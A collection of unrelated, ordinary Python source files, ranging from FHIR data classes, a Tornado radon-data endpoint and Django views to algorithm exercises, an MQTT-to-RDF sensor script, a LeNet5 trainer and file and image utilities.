resource_type: ClassVar[str] = "BiologicallyDerivedProductStorage"
description: Optional[str] = None
temperature: Optional[float] = None
scale: Optional[str] = None
duration: Optional[Period] = None
@dataclass
class BiologicallyDerivedProduct(DomainResource):
""" A material substance originating from a biological entity.
A material substance originating from a biological entity intended to be
transplanted or infused
into another (possibly the same) biological entity.
"""
resource_type: ClassVar[str] = "BiologicallyDerivedProduct"
identifier: Optional[List[Identifier]] = None
productCategory: Optional[str] = None
productCode: Optional[CodeableConcept] = None
status: Optional[str] = None
request: Optional[List[FHIRReference]] = None
quantity: Optional[int] = None
parent: Optional[List[FHIRReference]] = None
collection: Optional[BiologicallyDerivedProductCollection] = None
processing: Optional[List[BiologicallyDerivedProductProcessing]] = None
manipulation: Optional[BiologicallyDerivedProductManipulation] = None
storage: Optional[List[BiologicallyDerivedProductStorage]] = None
|
import logging
from eposfederator.libs.base.requesthandler import RequestHandler
from eposfederator.libs import downloader, serviceindex
from eposfederator.libs.base.schema import Schema
import tornado.iostream
from marshmallow import fields, validate
from webargs.tornadoparser import use_args
from shapely import geometry
import urllib
logger = logging.getLogger(__name__)
class RequestSchema(Schema):
class Meta():
dateformat = '%Y-%m-%dT%H:%M:%S.%fZ'
strict = True
mintime = fields.DateTime(
required=True,
metadata={
"label": "Minimum time"
},
description="Start data selection from this UTC datetime"
)
maxtime = fields.DateTime(
required=True,
metadata={
"label": "Maximum time"
},
description="End data selection at this UTC datetime"
)
maxlat = fields.Float(
validate=validate.Range(max=90, min=-90),
required=True,
metadata={
"label": "Maximum latitude"
},
description="Maximum latitude"
)
minlat = fields.Float(
validate=validate.Range(max=90, min=-90),
required=True,
metadata={
"label": "Minimum latitude"
},
description="Minimum latitude"
)
maxlon = fields.Float(
validate=validate.Range(max=180, min=-180),
required=True,
metadata={
"label": "Maximum longitude"
},
description="Maximum longitude"
)
minlon = fields.Float(
validate=validate.Range(max=180, min=-180),
required=True,
metadata={
"label": "Minimum longitude"
},
description="Minimum longitude"
)
minperiod = fields.Float(
required=False,
metadata={
"label": 'Minimum "sampling period" allowed to extract data [minutes]'
}
)
maxperiod = fields.Float(
required=False,
metadata={
"label": 'Maximum "sampling period" allowed to extract data [minutes]'
},
)
type_site = fields.String(
validate=validate.OneOf(["indoor", "shelter", "borehole", "soil"]),
default="indoor",
metadata={
"label": "Nickname of type of installation"
}
)
max_radon_err = fields.Float(
required=False,
validate=validate.Range(max=-180, min=180),
metadata={
"label": 'maximum % uncertainty of the measure accepted for extraction'
},
)
max_int_delta = fields.Float(
required=False,
validate=validate.Range(min=0),
metadata={
"label": 'maximum distance in time between internal temperature'
},
)
class Handler(RequestHandler):
ID = 'query'
DESCRIPTION = 'Federated Radon counts endpoint'
RESPONSE_TYPE = 'application/json'
REQUEST_SCHEMA = RequestSchema
ROUTE = ""
@use_args(RequestSchema)
async def get(self, reqargs):
try:
# attempt to define the geographic area for this query
bounds = geometry.Polygon([
(reqargs['minlon'], reqargs['minlat']), (reqargs['maxlon'], reqargs['minlat']),
(reqargs['maxlon'], reqargs['maxlat']), (reqargs['minlon'], reqargs['maxlat'])
])
except Exception as e:
bounds = None
reqargs['mintime'] = reqargs['mintime'].strftime('%Y-%m-%dT%H:%M:%S.000Z')
reqargs['maxtime'] = reqargs['maxtime'].strftime('%Y-%m-%dT%H:%M:%S.000Z')
args = urllib.parse.urlencode(reqargs, safe=':')
def ffunc(wspointer):
logger.info(f"filter_func is filtering {wspointer}")
logger.info(self.__class__)
return wspointer.handler == self.__class__
urls = serviceindex.get(geometry=bounds, filter_func=ffunc)
urls = [f"{url.url}?{args}" for url in urls]
self.write('{"results": [')
dlmgr = None
try:
# ask a dload manager to perform the downloads for us
# and store the download errors
dlmgr = downloader.DownloadManager(*urls)
async for chunk in dlmgr.fetch():
self.write(chunk)
await self.flush()
except tornado.iostream.StreamClosedError:
logger.warning("Client left. Aborting download from upstream.")
return
if dlmgr is not None and len(dlmgr.errors) > 0:
self.write('], "errors":[')
self.write(','.join(err.to_json() for err in dlmgr.errors))
self.write(']}')
await self.flush()
|
# @Title: 打印从1到最大的n位数 (打印从1到最大的n位数 LCOF)
# @Author: 18015528893
# @Date: 2021-01-17 18:57:24
# @Runtime: 44 ms
# @Memory: 20.2 MB
class Solution:
def printNumbers(self, n: int) -> List[int]:
return list(range(1, 10 ** n))
|
from events.models import Event, SourceArchive
from dateutil.rrule import *
from common.utils import set_eastern_timezone
import icalendar
import datetime
def process_ical(source):
print("Processing ical: " + source.name)
if source.name == "OPM Holidays":
print("Deleting existing OPM Holidays")
Event.objects.filter(sourceName=source.name).delete()
cal = icalendar.Calendar.from_ical(source.content)
for vevent in cal.walk('vevent'):
summary = (vevent.get('summary'),"")[not vevent.get('summary')]
description = (vevent.get('description'), "")[not vevent.get('description')]
location = (vevent.get('location'), "")[not vevent.get('location')]
allDay = True if isinstance(vevent.get('dtstart').dt, datetime.date) else False
startdate = set_eastern_timezone(vevent.get('dtstart').dt)
enddate = set_eastern_timezone(vevent.get('dtend').dt)
eventId = (vevent.get('uid'),"")[not vevent.get('uid')]
if vevent.get('rrule'):
reoccur = vevent.get('rrule').to_ical().decode('utf-8')
print("Recurring event detected, not supported yet")
else:
className = "event-opm" if source.name == "OPM Holidays" else "event-house-majority-leader"
chamber = "house" if source.name == "House Majority Leader" else ""
existingEvent = False
try:
existingEvent = Event.objects.get(sourceName=source.name, eventId=eventId)
except:
existingEvent = False
if existingEvent:
#print("Updating event: " + eventId)
existingEvent.sourceId=source.id
existingEvent.title=summary
existingEvent.description=description
existingEvent.notes=location
existingEvent.allDay=allDay
existingEvent.className=className
existingEvent.start=startdate
existingEvent.end=enddate
existingEvent.chamber=chamber
existingEvent.save(update_fields=['sourceId',
'title',
'description',
'notes',
'allDay',
'className',
'start',
'end',
'chamber'])
else:
#print("Creating event: " + eventId)
Event.objects.create(
sourceName=source.name,
sourceId=source.id,
eventId=eventId,
title=summary,
description=description,
notes=location,
allDay=allDay,
className=className,
start=startdate,
end=enddate,
chamber=chamber)
print("End processing ical: " + source.name)
return
|
# Uses python3
def edit_distance(seq_a, seq_b):
'''Compute the edit distance between two strings.
The edit distance between two strings is the minimum number of operations
(insertions, deletions, and substitutions of symbols) to transform
one string into another. It is a measure of similarity of two strings.'''
# 2D table of wide (colummns) len(seq_b), and high (rows) len(seq_a)
table = [[float('inf')] * (len(seq_b) + 1) for _ in range(len(seq_a) + 1)]
# Fill the first column of each row with 'a' indices
for y in range(len(seq_a) + 1):
table[y][0] = y
# Fill the first row of each colummn with 'b' indices
for x in range(len(seq_b) + 1):
table[0][x] = x
# Fill the table row by row with the minimum value possible for each node
for y in range(1, len(seq_a) + 1):
for x in range(1, len(seq_b) + 1):
if seq_a[y - 1] == seq_b[x - 1]: # indices start in 0 not in 1
diff = 0 # Match
else:
diff = 1 # Mismatch
# Deletion, Insertion, either Match(1) or Mismatch(0)
table[y][x] = min(table[y - 1][x] + 1, table[y][x - 1] + 1, table[y - 1][x - 1] + diff)
return table[len(seq_a)][len(seq_b)] # Node with optimal alignment (Lower right corner)
if __name__ == "__main__":
print(edit_distance(input(), input()))
|
from __future__ import absolute_import, division, print_function
from stripe import util
from stripe.api_resources.abstract import UpdateableAPIResource
from stripe.api_resources.transfer import Transfer
from stripe.six.moves.urllib.parse import quote_plus
class Reversal(UpdateableAPIResource):
OBJECT_NAME = "transfer_reversal"
def instance_url(self):
token = util.utf8(self.id)
transfer = util.utf8(self.transfer)
base = Transfer.class_url()
cust_extn = quote_plus(transfer)
extn = quote_plus(token)
return "%s/%s/reversals/%s" % (base, cust_extn, extn)
@classmethod
def modify(cls, sid, **params):
raise NotImplementedError(
"Can't modify a reversal without a transfer"
"ID. Call save on transfer.reversals.retrieve('reversal_id')"
)
@classmethod
def retrieve(cls, id, api_key=None, **params):
raise NotImplementedError(
"Can't retrieve a reversal without a transfer"
"ID. Use transfer.reversals.retrieve('reversal_id')"
)
|
"""
:platform: Unix, Windows
:synopsis: This is a minimal examples of the provided class StaircaseGenerator
.. moduleauthor:: Aron Heck
"""
from staircase_number_generator import StaircaseGenerator
def main():
"""
Asks for lower and upper bound then print staircase numbers and reset them and print them again
"""
lower_bound = int(input("Enter lower bound of number range as integer decimal:"))
upper_bound = int(input("Enter upper bound of number range as integer decimal:"))
staircase = StaircaseGenerator(lower_bound, upper_bound)
staircase.generate_staircase_from_lower_to_upper_bound()
staircase.print_generated_numbers()
if __name__ == "__main__":
main()
|
from django.views.generic import ListView, DetailView, CreateView, \
DeleteView, UpdateView, \
ArchiveIndexView, DateDetailView, \
DayArchiveView, MonthArchiveView, \
TodayArchiveView, WeekArchiveView, \
YearArchiveView
from teacher.models import Teacher_professional
class Teacher_professionalView(object):
model = Teacher_professional
def get_template_names(self):
"""Nest templates within teacher_professional directory."""
tpl = super(Teacher_professionalView, self).get_template_names()[0]
app = self.model._meta.app_label
mdl = 'teacher_professional'
#self.template_name = tpl.replace(app, '{0}/{1}'.format(app, mdl))
self.template_name = tpl[:8]+'teacher_professional/'+tpl[8:]
return [self.template_name]
class Teacher_professionalDateView(Teacher_professionalView):
date_field = 'timestamp'
month_format = '%m'
class Teacher_professionalBaseListView(Teacher_professionalView):
paginate_by = 10
class Teacher_professionalArchiveIndexView(
Teacher_professionalDateView, Teacher_professionalBaseListView, ArchiveIndexView):
pass
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalCreateView(Teacher_professionalView, CreateView):
pass
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalDateDetailView(Teacher_professionalDateView, DateDetailView):
pass
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalDayArchiveView(
Teacher_professionalDateView, Teacher_professionalBaseListView, DayArchiveView):
pass
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalDeleteView(Teacher_professionalView, DeleteView):
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalDetailView(Teacher_professionalView, DetailView):
pass
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalListView(Teacher_professionalBaseListView, ListView):
pass
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalMonthArchiveView(
Teacher_professionalDateView, Teacher_professionalBaseListView, MonthArchiveView):
pass
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalTodayArchiveView(
Teacher_professionalDateView, Teacher_professionalBaseListView, TodayArchiveView):
pass
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalUpdateView(Teacher_professionalView, UpdateView):
pass
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalWeekArchiveView(
Teacher_professionalDateView, Teacher_professionalBaseListView, WeekArchiveView):
pass
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalYearArchiveView(
Teacher_professionalDateView, Teacher_professionalBaseListView, YearArchiveView):
make_object_list = True
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
|
from djitellopy import tello
from time import sleep
import cv2
skynet = tello.Tello()
skynet.connect()
print(skynet.get_battery())
skynet.streamon()
while True:
img = skynet.get_frame_read().frame
#img = cv2.resize(img, (360, 240))
cv2.imshow("Image", img)
cv2.waitKey(1)
|
import time
import math
import sys
def BranchAndBound(graph, vertices, cutoff_time, num_edge):
start_time = time.time()
current_best = vertices
uppper_bound = len(graph)
trace = []
# the large graph will lead recursion error: maximum recursion depth exceeded in comparison
# so we need to set recursion limit
if sys.getrecursionlimit() < uppper_bound:
sys.setrecursionlimit(uppper_bound + 2)
def backtracking(cover, cover_num, subgraph, subgraph_num_edge):
if time.time() - start_time > cutoff_time:
# timeout
return
nonlocal current_best, trace, uppper_bound
# if there is no edge on current subgraph, there will search until status
if subgraph_num_edge == 0:
if len(cover) < uppper_bound:
cost = time.time() - start_time
current_best = [k for k, v in cover.items() if v]
print(len(current_best), cost)
uppper_bound = len(current_best)
trace.append(str(cost) + ' ' + str(uppper_bound))
return
# vertex <- findHighestUncoveredDegree
vertex, max_degree = findHighestUncoveredDegree(graph, cover)
if max_degree is None:
# all vertices selected
return
lb = math.ceil(subgraph_num_edge / max_degree)
if cover_num + lb >= uppper_bound:
# if current_used_vertex + lb >= current_best then pruning
return
# vertex is used
cover[vertex] = True
edges = subgraph[vertex]
# remove the edge of the vertex
for neighbor in edges:
subgraph[neighbor].remove(vertex)
del subgraph[vertex]
# backtracking
backtracking(cover, cover_num + 1, subgraph, subgraph_num_edge - len(edges))
# vertex is unused
# the vertex has been choosed, the vertex connected to that vertex has to be choosen
# it not, the edge won't be covered
new_cover = cover.copy()
new_cover[vertex] = False
for neighbor in edges:
new_cover[neighbor] = True
new_cover_num = len([k for k, v in new_cover.items() if v])
# backtracking
backtracking(new_cover, new_cover_num, subgraph, subgraph_num_edge - len(edges))
# restore the edge of subgraph
subgraph[vertex] = edges
for neighbor in edges:
subgraph[neighbor].add(vertex)
del cover[vertex]
# put the vertex connected to k into set so that we can modify on backtracking
graph = {k: set([int(i) for i in v]) for k, v in graph.items()}
backtracking({}, 0, graph, num_edge)
return current_best, trace
def findHighestUncoveredDegree(graph, cover):
'''
find the maximum degree of vertex that has not been covered
'''
best_vertex, max_degree = None, None
for k, v in graph.items():
if k not in cover and len(v) > 0:
if max_degree is None or max_degree < len(v):
max_degree = len(v)
best_vertex = k
return best_vertex, max_degree
'''
def readfile(filename):
with open(filename, "r") as f:
first_line = f.readline()
num_vertrix = int(first_line.split(" ")[0])
num_edge = int(first_line.split(" ")[1])
weight = int(first_line.split(" ")[2])
graph = defaultdict(list)
vertices = set()
index = 1
for line in f:
l = line.split(" ")
for i in l:
if i !='\n':
graph[index].append(i)
vertices.add(i)
index += 1
return graph,vertices
graph, vertices = readfile('../DATA/football.graph')
sol, trace = BranchAndBound(graph,vertices, 3)
'''
|
import os
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from tqdm import tqdm
from collections import Counter
from geo.data_paths import train
from geo.data_paths import species_occurences
from geo.preprocessing.preprocessing import create_trainset
def _create():
create_trainset()
csv = pd.read_csv(train)
#print("Count of different species:", data.species_count)
species_values = csv["species_glc_id"].values
counter = Counter(species_values)
countRows = len(csv.index)
names = []
occurences = []
percents = []
for item, c in counter.most_common():
names.append(item)
occurences.append(int(c))
percents.append(c / countRows * 100)
resulting_rows = list(zip(names, occurences, percents))
results_array = np.asarray(resulting_rows) #list to array to add to the dataframe as a new column
result_ser = pd.DataFrame(results_array, columns=["species", "occurences", "percents"])
result_ser.to_csv(species_occurences, index=False)
print(species_occurences)
#519 species have >= 100 occurences
#986 species have < 10 occurences
def load_species_occurences():
assert os.path.exists(species_occurences)
return pd.read_csv(species_occurences)
def extract_species_occurences():
if not os.path.exists(species_occurences):
_create()
else:
print("Species occurences already saved.")
if __name__ == '__main__':
_create()
|
import torch
import torch.cuda
import torch.nn as nn
import torch.optim as optim
import random
import numpy as np
import sklearn.metrics
import time
import logging
import json
from src.utils.utils import print_progessbar
class LeNet5_trainer:
"""
Trainer of LeNet5 archiecture.
"""
def __init__(self, net, n_epoch=100, batch_size=128, num_workers=0, lr=1e-3,
lr_decay=0.95, device='cpu', optimizer=None, loss_fn=None,
seed=-1):
"""
Built a LeNet5 trainer. It enables to train and evaluate a LeNet5 architecture.
"""
# set seed for reproducibility
if seed != -1:
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
random.seed(seed)
torch.backends.cudnn.deterministic=True
torch.backends.cudnn.benchmark = False
self.seed = seed
# Trainig parameters
self.device = device
self.net = net.to(self.device)
self.n_epoch = n_epoch
self.batch_size = batch_size
self.num_workers = num_workers
self.lr = lr
self.lr_decay = lr_decay
if optimizer == 'Adam':
self.optimizer = optim.Adam(self.net.parameters(), lr=self.lr)
elif optimizer == 'SGD':
self.optimizer = optim.SGD(self.net.parameters(), lr=self.lr)
else:
raise ValueError('Only Adam and SGD are supported.')
self.scheduler = optim.lr_scheduler.MultiplicativeLR(self.optimizer, lr_lambda=lambda ep: self.lr_decay) # manage the change in learning rate
self.loss_fn = nn.CrossEntropyLoss() if loss_fn is None else loss_fn
# Outputs
self.train_acc = None
self.test_acc = None
self.test_pred = None
self.train_time = None
self.epoch_loss_list = []
def train(self, train_dataset, test_dataset):
"""
Train the LeNet5 on the provided dataset.
"""
logger = logging.getLogger()
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=self.batch_size,
num_workers=self.num_workers)
n_batch = len(train_loader)
logger.info(f'>>> Start Training the LeNet5 with seed {self.seed}.')
start_time = time.time()
for epoch in range(self.n_epoch):
epoch_start_time = time.time()
epoch_loss = 0.0
# minibatch iteration
for b, (train_input, train_label, _) in enumerate(train_loader):
train_input = train_input.float().to(self.device)
train_input.require_grad = True
train_label = train_label.to(self.device)
# update weight by backpropagation
pred = self.net(train_input)
loss = self.loss_fn(pred, train_label)
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
epoch_loss += loss.item()
print_progessbar(b, n_batch, Name='Train Batch', Size=40, erase=True)
# evaluate on test set
test_acc, _ = self.evaluate(test_dataset, last=False)
# store epoch stat
self.epoch_loss_list.append([epoch+1, epoch_loss / n_batch, test_acc])
# print summary statistics
logger.info(f'>>> | Epoch {epoch+1:03}/{self.n_epoch:03} '
f'| Loss {epoch_loss / n_batch:.7f} '
f'| Test Accuracy {test_acc:.3%} '
f'| Time {time.time() - epoch_start_time:.2f} [s] |')
# update leanring rate
self.scheduler.step()
# Get results
self.train_time = time.time() - start_time
self.train_acc, _ = self.evaluate(train_dataset, last=False)
logger.info(f'>>> Finished training of LeNet5')
logger.info(f'>>> Train time {self.train_time:.0f} [s]')
logger.info(f'>>> Train accuracy {self.train_acc:.3%}\n')
def evaluate(self, dataset, last=True):
"""
Evaluate the network with the porvided dataloader and return the accuracy score.
"""
if last:
logger = logging.getLogger()
logger.info('>>> Start Evaluating the LeNet5.')
loader = torch.utils.data.DataLoader(dataset, batch_size=self.batch_size,
num_workers=self.num_workers)
N = len(loader)
with torch.no_grad():
pred, label, index = [], [], []
for b, (input_data, input_label, idx) in enumerate(loader):
input_data = input_data.float().to(self.device)
input_label = input_label.to(self.device)
idx = idx.to(self.device)
# classify sample
pred += self.net(input_data).argmax(dim=1).tolist()
label += input_label.tolist()
index += idx.tolist()
print_progessbar(b, N, Name='Evaluation Batch', Size=40, erase=True)
# compute accuracy
acc = sklearn.metrics.accuracy_score(label, pred)
if last:
self.test_acc, self.test_pred = acc, (index, label, pred)
logger.info(f'>>> Test accuracy {self.test_acc:.3%} \n')
else:
return acc, pred
def save_model(self, export_path):
"""
save the model at the given path.
"""
torch.save({'net_dict': self.net.state_dict()}, export_path)
def load_model(self, import_path, map_location='cuda'):
"""
Load a model from the given file.
"""
model = torch.load(import_path, map_location=map_location)
self.net.load_state_dict(model['net_dict'])
def save_results(self, export_path):
"""
Save the results on a JSON.
"""
results = {'train_time': self.train_time,
'loss': self.epoch_loss_list,
'train_acc': self.train_acc,
'test_acc': self.test_acc,
'test_pred': self.test_pred}
with open(export_path, 'w') as fb:
json.dump(results, fb)
|
from django.apps import AppConfig
from django.utils.importlib import import_module
class OffersConfig(AppConfig):
name = 'commercia.offers'
verbose_name = "Offers"
def ready(self):
import_module('commercia.offers.collections')
import_module('commercia.offers.signals')
|
from datetime import datetime
import pytz
import settings
from ical_importer import iCalParser
if __name__ == "__main__":
""" Script that instantiates an iCalParser class and imports the Sessions into Guidebook """
demo_day = datetime(2017, 11, 17, 0, 0, 0, 0, pytz.UTC) # iCalParser allows you to simulate the "day" the parser is being run at. Needed for demo
ical_parser = iCalParser(gb_api_key=settings.GB_API_KEY, guide_id=settings.GUIDE_ID, today=demo_day)
print 'Importing Sessions into Guide {}'.format(settings.GUIDE_ID)
with open("sample_ical.ics") as ical_file:
ical_parser.parse(ical_file)
|
from os import write
import paho.mqtt.client as mqtt # pip install paho.mqtt
import time
import datetime
from rdflib import Graph, URIRef, BNode, Literal, Namespace
from rdflib.namespace import RDF, RDFS, XSD, SOSA, TIME
import numpy as np
g = Graph()
BASE = Namespace("http://example.org/data/")
QUDT11 = Namespace("http://qudt.org/1.1/schema/qudt#")
QUDTU11 = Namespace("http://qudt.org/1.1/vocab/unit#")
CDT = Namespace("http://w3id.org/lindt/custom_datatypes#")
g.bind('rdf', RDF)
g.bind('rdfs', RDFS)
g.bind('xsd', XSD)
g.bind('sosa', SOSA)
g.bind('time', TIME)
g.bind('qudt-1-1', QUDT11)
g.bind('qudt-unit-1-1', QUDTU11)
g.bind('cdt', CDT)
##### Ressources #####
# earthAtmosphere ressources
earthAtmosphere = URIRef('earthAtmosphere')
earthAtmosphere_label = Literal("Atmosphere of Earth", lang="en")
# Iphone ressources
iphone7 = URIRef('iphone7/35-207306-844818-0')
iphone7_label = Literal("IPhone 7 - IMEI 35-207306-844818-0", lang="en")
iphone7_comment = Literal("IPhone 7 - IMEI 35-207306-844818-0 - John Doe", lang="en")
# sensor ressources
sensor = URIRef('sensor/35-207306-844818-0/BMP282')
sensor_obs = URIRef('sensor/35-207306-844818-0/BMP282/atmosphericPressure')
sensor_label = Literal("Bosch Sensortec BMP282", lang="en")
# Observation 346345 ressources
observation_346345 = URIRef('Observation/346345')
###################
##### RDF Triples #####
# earthAtmosphere
g.add((earthAtmosphere, RDF.type, SOSA.FeatureOfInterest))
g.add((earthAtmosphere, RDFS.label, earthAtmosphere_label))
# iphone 7
g.add((iphone7, RDF.type, SOSA.Platform))
g.add((iphone7, RDFS.label, iphone7_label))
g.add((iphone7, RDFS.comment, iphone7_comment))
g.add((iphone7, SOSA.hosts, sensor))
# sensor
g.add((sensor, RDF.type, SOSA.Observation))
g.add((sensor, RDFS.label, sensor_label))
g.add((sensor, SOSA.observes, sensor_obs))
# Observation 346345
g.add((observation_346345, RDF.type, SOSA.Observation))
g.add((observation_346345, SOSA.observedProperty, sensor_obs))
g.add((observation_346345, SOSA.hasFeatureOfInterest, earthAtmosphere))
g.add((observation_346345, SOSA.madeBySensor, sensor_obs))
observation_346345_result = BNode()
g.add((observation_346345, SOSA.hasResult, observation_346345_result))
g.add((observation_346345_result, RDF.type, QUDT11.QuantityValue))
g.add((observation_346345_result, QUDT11.numericValue, Literal("101936", datatype=XSD.double)))
g.add((observation_346345_result, QUDT11.unit, QUDTU11.Pascal))
observation_346345_resultTime = BNode()
g.add((observation_346345, SOSA.resultTime, observation_346345_resultTime))
g.add((observation_346345_resultTime, RDF.type, TIME.Instant))
g.add((observation_346345_resultTime, TIME.inXSDDateTimeStamp, Literal("2017-06-06T12:36:13+00:00", datatype=XSD.dateTimeStamp)))
########################
def print_graph(gg):
print(gg.serialize(format='ttl', base=BASE).decode('u8'))
########################
def on_message(client, userdata, message):
[reading, dt] = message.payload.decode('utf-8').split('|')
new_obs = URIRef("Observation/" + str(on_message.id))
on_message.id += 1
print("Message received")
g.add((new_obs, RDF.type, SOSA.Observation))
g.add((new_obs, SOSA.observedProperty, sensor_obs))
g.add((new_obs, SOSA.hasFeatureOfInterest, earthAtmosphere))
g.add((new_obs, SOSA.madeBySensor, sensor))
g.add((new_obs, SOSA.hasSimpleResult, Literal(reading, datatype=CDT.ucum)))
g.add((new_obs, SOSA.resultTime, Literal(dt, datatype=XSD.dateTime)))
on_message.id = 1
print("creating new instance")
client = mqtt.Client("OUOFZOBFOUZFB") # create new instance (the ID, in this case "P1", must be unique)
#broker_address = "localhost" # Use your own MQTT Server IP Adress (or domain name) here, or ...
broker_address = "test.mosquitto.org" # ... use the Mosquitto test server during development
client.username_pw_set("admin", "password")
client.connect(broker_address) # connect to broker
client.subscribe("teds20/group10/pressure", qos=2) # subscribe
time.sleep(2)
try:
print("connecting to broker")
client.loop_start() # start the event processing loop
for i in range(10):
client.on_message = on_message # attach "on_message" callback function (event handler) to "on_message" event
time.sleep(1) # wait 4 seconds before stopping the event processing loop (so all pending events are processed)
time.sleep(4) # wait 4 seconds before stopping the event processing loop (so all pending events are processed)
client.loop_stop() # stop the event processing loop
client.unsubscribe("teds20/group10/pressure") # unsubscribe
print("\ndisconnecting from broker\n")
client.disconnect() # disconnect from broker
except Exception as e:
# if we receive an exception (error) in the "try" block,
# handle it here, by printing out the error message
print(f"connection error: {e}")
print_graph(g)
with open("publisher.ttl", "w") as f:
f.write(g.serialize(format='ttl', base=BASE).decode('u8'))
|
from __future__ import print_function
import os
import sys
import stat
from datetime import datetime
import math
import csv
import argparse
fieldnames = [
# CUSTOM
"File_Name", "Type", "Full_Path",
"Date_Modified", "Date_Created", "Date_Accessed",
"DateTime_Modified", "DateTime_Created", "DateTime_Accessed",
"Size",
# ATTRIBUTES
"st_size", "st_mode", "st_ino", "st_dev", "st_nlink",
"st_uid", "st_gid",
# TIMESTAMPS
"st_atime", "st_mtime", "st_ctime",
"st_atime_ns", "st_mtime_ns", "st_ctime_ns",
# ATTRIBUTES ON MISC SYSTEMS
"st_blocks", "st_blksize", "st_rdev", "st_flags",
"st_gen", "st_birthtime", "st_fstype", "st_ftype",
"st_attrs", "st_obtype", "st_rsize", "st_creator",
"st_type", "st_file_attributes"
]
def walktree(top, callback):
# From Python documentation
'''recursively descend the directory tree rooted at top,
calling the callback function for each regular file'''
for f in os.listdir(top):
pathname = os.path.join(top, f)
current_stat = os.stat(pathname)
mode = current_stat.st_mode
if stat.S_ISDIR(mode):
# It's a directory, recurse into it
walktree(pathname, callback)
elif stat.S_ISREG(mode):
# It's a file, call the callback function
callback(pathname, current_stat)
else:
# Unknown file type, print a message
print('Skipping {}'.format(pathname))
def stat_to_dictionary(stat_obj):
result = dict((field, getattr(stat_obj, field, None))
for field in fieldnames)
return result
def h_datetime(timestamp):
return datetime.utcfromtimestamp(timestamp).strftime(
'%Y-%m-%d|%H:%M:%S'
).split("|")
def get_human_size(stat_obj):
size_bytes = stat_obj.st_size
# From https://stackoverflow.com/questions/5194057/better-way-to-convert-file-sizes-in-python
if size_bytes == 0:
return "0B"
size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
i = int(math.floor(math.log(size_bytes, 1024)))
p = math.pow(1024, i)
s = round(size_bytes / p, 2)
result = "{size}{unit}".format(size=s, unit=size_name[i])
return result
def get_type(mode):
if stat.S_ISREG(mode):
return "file"
if stat.S_ISDIR(mode):
return "directory"
else:
return "unknown"
def get_stat_dict(file_path, stat_obj):
stat_dict = stat_to_dictionary(stat_obj)
stat_dict["File_Name"] = os.path.basename(file_path)
stat_dict["Full_Path"] = os.path.abspath(file_path)
stat_dict["Date_Modified"] = h_datetime(stat_obj.st_mtime)[0]
stat_dict["Date_Accessed"] = h_datetime(stat_obj.st_atime)[0]
stat_dict["Date_Created"] = h_datetime(stat_obj.st_ctime)[0]
stat_dict["DateTime_Modified"] = (" ").join(
h_datetime(stat_obj.st_mtime)[0:2])
stat_dict["DateTime_Accessed"] = (" ").join(
h_datetime(stat_obj.st_atime)[0:2])
stat_dict["DateTime_Created"] = (" ").join(
h_datetime(stat_obj.st_ctime)[0:2])
stat_dict["Size"] = get_human_size(stat_obj)
stat_dict["Type"] = get_type(stat_obj.st_mode)
return stat_dict
def process_file_metadata_with(effect):
def process_file_metadata(file_path, stat_obj):
stat_dict = get_stat_dict(file_path, stat_obj)
effect(stat_dict)
print("Read {}".format(file_path))
return process_file_metadata
def scan_folder(append=False, folders=["."], output="Files.csv"):
if append is False:
if os.path.exists(output):
os.remove(output)
csvFile = open(output, 'a')
writer = csv.DictWriter(csvFile, restval="", delimiter=',',
extrasaction='ignore', fieldnames=fieldnames)
if append is False:
writer.writeheader()
for folder in folders:
walktree(folder, process_file_metadata_with(writer.writerow))
csvFile.close()
def parse_arguments():
parser = argparse.ArgumentParser(
description='Creates csv record of files in one or more folders.')
parser.add_argument("folders", nargs='+', help='Base folder')
parser.add_argument(
"-o", "--output", help="output filename", default="Files.csv")
parser.add_argument("-a", "--append", action='store_true',
help='Append to output file', default=False)
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_arguments()
scan_folder(append=args.append, folders=args.folders, output=args.output)
|
##########################################################################################
# Utility functions for images
##########################################################################################
import os
import cv2
import glob
import numpy as np
from PIL import Image
from matplotlib.image import imread
def load_image(path, size=None):
"""
Load the image from the given file-path and resize it to the given size if not None.
Eg: size = (width, height)
"""
img = Image.open(path)
if (size != None) and (size != ''):
img = img.resize(size=size, resample=Image.LANCZOS)
img = np.array(img)
# Scale image-pixels so they fall between 0.0 and 1.0
# img = img / 255.0
# Convert 2-dim gray-scale array to 3-dim RGB array.
if (len(img.shape) == 2):
img = np.repeat(img[:, :, np.newaxis], 3, axis=2)
return np.array(img)
def load_images(image_paths):
# Load the images from disk.
images = [imread(path) for path in image_paths]
# Convert to a numpy array and return it.
return np.asarray(images)
def load_images_v2(image_paths_list):
images = []
for image_path in image_paths_list:
image = Image.open(image_path)
image = np.array(image, dtype=np.float32)
images.append(image)
images = np.array(images)
# images = np.array([np.array(Image.open(image_path), dtype=np.float32) for image_path in image_paths_list])
return images
def get_images_path_list_from_dir(dir_path, img_format='jpg'):
img_regex = os.path.join(dir_path, '*.' + img_format)
img_paths = glob.glob(img_regex)
# imgs = [load_image(img_path) for img_path in img_paths]
# return np.array(imgs), img_paths
return img_paths
def save_image(image_np, image_path_name):
img = Image.fromarray(image_np)
img.save(image_path_name)
